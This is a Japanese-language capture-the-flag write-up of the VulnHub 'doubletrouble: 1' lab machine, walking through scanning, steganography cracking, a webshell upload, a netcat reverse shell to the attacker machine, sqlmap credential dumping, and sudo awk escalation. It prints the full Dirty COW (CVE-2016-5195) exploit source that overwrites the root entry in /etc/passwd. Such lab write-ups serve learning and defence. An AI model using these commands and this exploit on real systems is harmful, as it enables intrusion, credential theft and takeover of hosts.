靶机ダウンロード:doubletrouble: 1
前置#
靶机ネットワーク NAT モード
IP 範囲をスキャンして靶机 IP が検出できない場合は、この記事を参照してください:
vulnhub 靶机検出できない IP アドレスの解決方法
1. 情報収集
netdiscover を使用して IP 範囲をスキャン
netdiscover -r 192.168.23.0/24
発見した IP:192.168.23.136
nmap でポートをスキャン
nmap -p- 192.168.23.136
開放ポート 22,80
ホームページにアクセス
qdPM バージョン 9.1 を使用していることがわかり、exploit-dbで RCE、SQL インジェクションなどの脆弱性が存在することが確認できる
dirb でディレクトリをスキャン
dirb http://192.168.23.136/
secret ディレクトリに画像 doubletrouble.jpg があることがわかる
stegseek を使用してブルートフォース
辞書は kali に付属の rockyou.txt を使用し、/usr/share/wordlists/rockyou.txt.gz にあり、解凍後に使用
kali で stegseek のインストールに何度も失敗し、docker で実行することに変更、具体的にはStegseekを参照する必要があり、まず Windows に docker desktop をインストールする必要があります
docker run --rm -it -v "$(pwd):/steg" rickdejager/stegseek [stegofile.jpg] [wordlist.txt]
このコマンドは Windows の cmd で直接実行できないため、完全なパスに変更
docker run --rm -v "C:\Users\Mikiya\Desktop:/steg" rickdejager/stegseek /steg/doubletrouble.jpg /steg/rockyou.txt
ここで C:\Users\Mikiya\Desktop は私の 2 つのファイルの保存場所、つまり画像と辞書であり、メモ帳で出力ファイルを開くとアカウントのパスワードが得られる
otisrush@localhost.com
otis666
2. 浸透
システムにログインし、私の詳細で利用ポイントを発見し、一言木馬ファイルをアップロードし、アップロードパスを訪問 /uploads/users/
蚁剑で接続
権限昇格
awk コマンドが sudo で実行できることがわかる
sudo awk 'BEGIN {system ("/bin/bash")}' で権限昇格
蚁剑は直接権限昇格できないため、nc を使用してシェルをリバウンドさせて権限昇格する
kali でポートをリッスン:nc -nvlp 9999
蚁剑で実行:nc -e /bin/bash 192.168.23.134 9999
権限昇格コマンド
ローカルターミナルを呼び出す方が便利
python3 -c 'import pty;pty.spawn("/bin/bash")'
ルートディレクトリに仮想マシンがもう一つあることがわかる
nc でファイルを転送
kali ターミナル:nc -lvvp 8888 > doubletrouble.ova
靶机ターミナル:nc 192.168.23.134 8888 < doubletrouble.ova
VM を靶机にインポートし、ホスト IP を検出し、ポート 22,80 を開放
80 ポートにアクセス
sqlmap を直接実行
sqlmap -u http://192.168.23.137/index.php -forms --dbs --batch
2 つのデータベースが見つかる
順次テーブル名とデータを取得
sqlmap -u "http://192.168.23.137/index.php" \
--data="uname=AqUH&psw=Kgjz&btnLogin=Login" \
--dbms=mysql \
--tables -D doubletrouble \
--batch
sqlmap -u "http://192.168.23.137/index.php" \
--data="uname=AqUH&psw=Kgjz&btnLogin=Login" \
--dbms=mysql \
--batch \
--dump -D doubletrouble -T users
以下の情報を得る
GfsZxc1,montreux
ZubZub99,clapton
2 番目のアカウントで ssh ログインして最初の flag を取得
通常の権限のため、さらに権限を昇格し、カーネルバージョンを確認
Dirty Cow 権限昇格脆弱性が存在する
Dirty Cow Linux ローカル権限昇格脆弱性の再現 (CVE-2016-5195)
dirty.c スクリプトを使用して権限を昇格dirty.c
//
// このエクスプロイトはdirtycow脆弱性のポケモンエクスプロイトをベースにしており、
// 新しいpasswd行を自動的に生成します。
// バイナリが実行されると、新しいパスワードを入力するように求められます。
// 元の/etc/passwdファイルは/tmp/passwd.bakにバックアップされ、
// 生成された行でrootアカウントを上書きします。
// エクスプロイトを実行した後、新しく作成されたユーザーでログインできるはずです。
//
// このエクスプロイトを使用するには、必要に応じてユーザー値を変更します。
// デフォルトは"firefart"です。
//
// 元のエクスプロイト(dirtycowのptrace_pokedata "pokemon"メソッド):
// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// コンパイル方法:
// gcc -pthread dirty.c -o dirty -lcrypt
//
// その後、次のいずれかの方法で新しく作成されたバイナリを実行します:
// "./dirty" または "./dirty my-new-password"
//
// その後、"su firefart"または"ssh firefart@..."を実行できます。
//
// エクスプロイトを実行した後は、/etc/passwdを復元するのを忘れないでください!
// mv /tmp/passwd.bak /etc/passwd
//
// エクスプロイトはChristian "FireFart" Mehlmauerによって採用されました
// https://firefart.at
//
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>
const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "firefart";
int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;
struct Userinfo {
char *username;
char *hash;
int user_id;
int group_id;
char *info;
char *home_dir;
char *shell;
};
char *generate_password_hash(char *plaintext_pw) {
return crypt(plaintext_pw, salt);
}
char *generate_passwd_line(struct Userinfo u) {
const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
int size = snprintf(NULL, 0, format, u.username, u.hash,
u.user_id, u.group_id, u.info, u.home_dir, u.shell);
char *ret = malloc(size + 1);
sprintf(ret, format, u.username, u.hash, u.user_id,
u.group_id, u.info, u.home_dir, u.shell);
return ret;
}
void *madviseThread(void *arg) {
int i, c = 0;
for(i = 0; i < 200000000; i++) {
c += madvise(map, 100, MADV_DONTNEED);
}
printf("madvise %d\n\n", c);
}
int copy_file(const char *from, const char *to) {
// ターゲットファイルがすでに存在するか確認
if(access(to, F_OK) != -1) {
printf("ファイル %s はすでに存在します!削除して再実行してください\n",
to);
return -1;
}
char ch;
FILE *source, *target;
source = fopen(from, "r");
if(source == NULL) {
return -1;
}
target = fopen(to, "w");
if(target == NULL) {
fclose(source);
return -1;
}
while((ch = fgetc(source)) != EOF) {
fputc(ch, target);
}
printf("%s を %s に正常にバックアップしました\n",
from, to);
fclose(source);
fclose(target);
return 0;
}
int main(int argc, char *argv[])
{
// バックアップファイル
int ret = copy_file(filename, backup_filename);
if (ret != 0) {
exit(ret);
}
struct Userinfo user;
// 値を設定し、必要に応じて変更
user.username = "firefart";
user.user_id = 0;
user.group_id = 0;
user.info = "pwned";
user.home_dir = "/root";
user.shell = "/bin/bash";
char *plaintext_pw;
if (argc >= 2) {
plaintext_pw = argv[1];
printf("新しいパスワードを入力してください: %s\n", plaintext_pw);
} else {
plaintext_pw = getpass("新しいパスワードを入力してください: ");
}
user.hash = generate_password_hash(plaintext_pw);
char *complete_passwd_line = generate_passwd_line(user);
printf("完全な行:\n%s\n", complete_passwd_line);
f = open(filename, O_RDONLY);
fstat(f, &st);
map = mmap(NULL,
st.st_size + sizeof(long),
PROT_READ,
MAP_PRIVATE,
f,
0);
printf("mmap: %lx\n",(unsigned long)map);
pid = fork();
if(pid) {
waitpid(pid, NULL, 0);
int u, i, o, c = 0;
int l=strlen(complete_passwd_line);
for(i = 0; i < 10000/l; i++) {
for(o = 0; o < l; o++) {
for(u = 0; u < 10000; u++) {
c += ptrace(PTRACE_POKETEXT,
pid,
map + o,
*((long*)(complete_passwd_line + o)));
}
}
}
printf("ptrace %d\n",c);
}
else {
pthread_create(&pth,
NULL,
madviseThread,
NULL);
ptrace(PTRACE_TRACEME);
kill(getpid(), SIGSTOP);
pthread_join(pth,NULL);
}
printf("完了!新しいユーザーが作成されたかどうかは %s を確認してください。\n", filename);
printf("ユーザー名 '%s' とパスワード '%s' でログインできます。\n\n",
user.username, plaintext_pw);
printf("\n復元するのを忘れないでください! $ mv %s %s\n",
backup_filename, filename);
return 0;
}
kali で http サーバーを作成
python -m http.server 80
靶机は wget コマンドを使用
wget http://192.168.23.130/dirty.c
作者の指示に従って gcc で権限を昇格
gcc -pthread dirty.c -o dirty -lcrypt
./dirty
root を正常に取得し、root ディレクトリに 2 番目の flag を見つける
まとめ#
使用ツール:nmap で IP ポートをスキャン、dirb でディレクトリをスキャン、stegseek で画像をブルートフォース、nc でファイルを転送、蚁剑、sqlmap でデータベースをブルートフォース、スクリプトで権限を昇格
sudo awk 'BEGIN {system ("/bin/bash")}' で権限を昇格
この記事の解題プロセスはDOUBLETROUBLE: 1とvulnhub 靶机 --DoubleTroubleに基づいています